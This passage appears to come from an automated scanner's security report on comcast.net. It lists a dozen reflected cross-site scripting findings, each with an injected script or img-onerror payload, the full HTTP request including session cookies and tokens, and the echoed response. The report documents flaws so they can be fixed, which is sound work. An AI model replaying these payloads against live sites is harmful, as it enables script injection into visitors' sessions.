<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<link rel="alternate" href="/feeds/rss/entertainment/reelnewsfb8d2"><script>alert(1)</script>befae20f7ae/" type="application/rss+xml" title="Comcast.net - Entertainment" id="rss" />
...[SNIP]...

2.153. http://www.comcast.net/finance/forwhatitsworth/6470358/outrageousceoperksthisyearstoppicks/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /finance/forwhatitsworth/6470358/outrageousceoperksthisyearstoppicks/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload c6f94--><img%20src%3da%20onerror%3dalert(1)>39e088bf6ea was submitted in the REST URL parameter 2. This input was echoed as c6f94--><img src=a onerror=alert(1)>39e088bf6ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /finance/forwhatitsworthc6f94--><img%20src%3da%20onerror%3dalert(1)>39e088bf6ea/6470358/outrageousceoperksthisyearstoppicks/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:11 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:11 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: forwhatitsworthc6f94--><img src=a onerror=alert(1)>39e088bf6ea -->
...[SNIP]...

2.154. http://www.comcast.net/finance/forwhatitsworth/6470358/outrageousceoperksthisyearstoppicks/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /finance/forwhatitsworth/6470358/outrageousceoperksthisyearstoppicks/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3bdd0<img%20src%3da%20onerror%3dalert(1)>d9e3b3a0d20 was submitted in the REST URL parameter 2. This input was echoed as 3bdd0<img src=a onerror=alert(1)>d9e3b3a0d20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /finance/forwhatitsworth3bdd0<img%20src%3da%20onerror%3dalert(1)>d9e3b3a0d20/6470358/outrageousceoperksthisyearstoppicks/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:07 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:07 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='finance' subchannel'forwhatitsworth3bdd0<img src=a onerror=alert(1)>d9e3b3a0d20'</h2>
...[SNIP]...

2.155. http://www.comcast.net/finance/taxcenter/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /finance/taxcenter/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload af101<img%20src%3da%20onerror%3dalert(1)>df8f6893f8b was submitted in the REST URL parameter 2. This input was echoed as af101<img src=a onerror=alert(1)>df8f6893f8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /finance/taxcenteraf101<img%20src%3da%20onerror%3dalert(1)>df8f6893f8b/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:50 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:50 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:18:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='finance' subchannel'taxcenteraf101<img src=a onerror=alert(1)>df8f6893f8b'</h2>
...[SNIP]...

2.156. http://www.comcast.net/finance/taxcenter/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /finance/taxcenter/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload af54b--><img%20src%3da%20onerror%3dalert(1)>653cf74b701 was submitted in the REST URL parameter 2. This input was echoed as af54b--><img src=a onerror=alert(1)>653cf74b701 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /finance/taxcenteraf54b--><img%20src%3da%20onerror%3dalert(1)>653cf74b701/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:53 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:53 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:18:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: taxcenteraf54b--><img src=a onerror=alert(1)>653cf74b701 -->
...[SNIP]...

2.157. http://www.comcast.net/local/19103/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /local/19103/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6fbe"><img%20src%3da%20onerror%3dalert(1)>af36ff5364e was submitted in the REST URL parameter 2. This input was echoed as b6fbe"><img src=a onerror=alert(1)>af36ff5364e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /local/19103b6fbe"><img%20src%3da%20onerror%3dalert(1)>af36ff5364e/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:47 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:47 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:47 GMT
Content-Length: 28243
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
   <meta h
...[SNIP]...
<input type="hidden" name="l" value="19103b6fbe"><img src=a onerror=alert(1)>af36ff5364e" />
...[SNIP]...

2.158. http://www.comcast.net/news/national/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/national/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 13854--><img%20src%3da%20onerror%3dalert(1)>2c2f086376f was submitted in the REST URL parameter 2. This input was echoed as 13854--><img src=a onerror=alert(1)>2c2f086376f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /news/national13854--><img%20src%3da%20onerror%3dalert(1)>2c2f086376f/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:35 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: national13854--><img src=a onerror=alert(1)>2c2f086376f -->
...[SNIP]...

2.159. http://www.comcast.net/news/national/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/national/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1613b<img%20src%3da%20onerror%3dalert(1)>ca95b061931 was submitted in the REST URL parameter 2. This input was echoed as 1613b<img src=a onerror=alert(1)>ca95b061931 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /news/national1613b<img%20src%3da%20onerror%3dalert(1)>ca95b061931/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:30 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:30 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='news' subchannel'national1613b<img src=a onerror=alert(1)>ca95b061931'</h2>
...[SNIP]...

2.160. http://www.comcast.net/news/national/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/national/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bc26"><script>alert(1)</script>895fb0d3fa6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national1bc26"><script>alert(1)</script>895fb0d3fa6/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:20 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:20 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<link rel="alternate" href="/feeds/rss/news/national1bc26"><script>alert(1)</script>895fb0d3fa6/" type="application/rss+xml" title="Comcast.net - News" id="rss" />
...[SNIP]...

2.161. http://www.comcast.net/news/odd/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/odd/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cafd"><script>alert(1)</script>c6016ae582e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/odd6cafd"><script>alert(1)</script>c6016ae582e/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:20 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:20 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<link rel="alternate" href="/feeds/rss/news/odd6cafd"><script>alert(1)</script>c6016ae582e/" type="application/rss+xml" title="Comcast.net - News" id="rss" />
...[SNIP]...

2.162. http://www.comcast.net/news/odd/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/odd/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 88c7e--><img%20src%3da%20onerror%3dalert(1)>edebff5d184 was submitted in the REST URL parameter 2. This input was echoed as 88c7e--><img src=a onerror=alert(1)>edebff5d184 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /news/odd88c7e--><img%20src%3da%20onerror%3dalert(1)>edebff5d184/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:34 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:34 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: odd88c7e--><img src=a onerror=alert(1)>edebff5d184 -->
...[SNIP]...

2.163. http://www.comcast.net/news/odd/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/odd/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48f02<img%20src%3da%20onerror%3dalert(1)>39ff31c1383 was submitted in the REST URL parameter 2. This input was echoed as 48f02<img src=a onerror=alert(1)>39ff31c1383 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /news/odd48f02<img%20src%3da%20onerror%3dalert(1)>39ff31c1383/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:29 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='news' subchannel'odd48f02<img src=a onerror=alert(1)>39ff31c1383'</h2>
...[SNIP]...

2.164. http://www.comcast.net/news/politics/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/politics/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7b71"><script>alert(1)</script>f076230e9b9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/politicsc7b71"><script>alert(1)</script>f076230e9b9/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:12 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:12 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
